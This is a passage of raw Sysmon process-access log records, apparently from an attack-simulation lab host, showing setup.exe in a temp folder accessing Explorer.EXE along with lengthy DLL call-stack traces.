1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 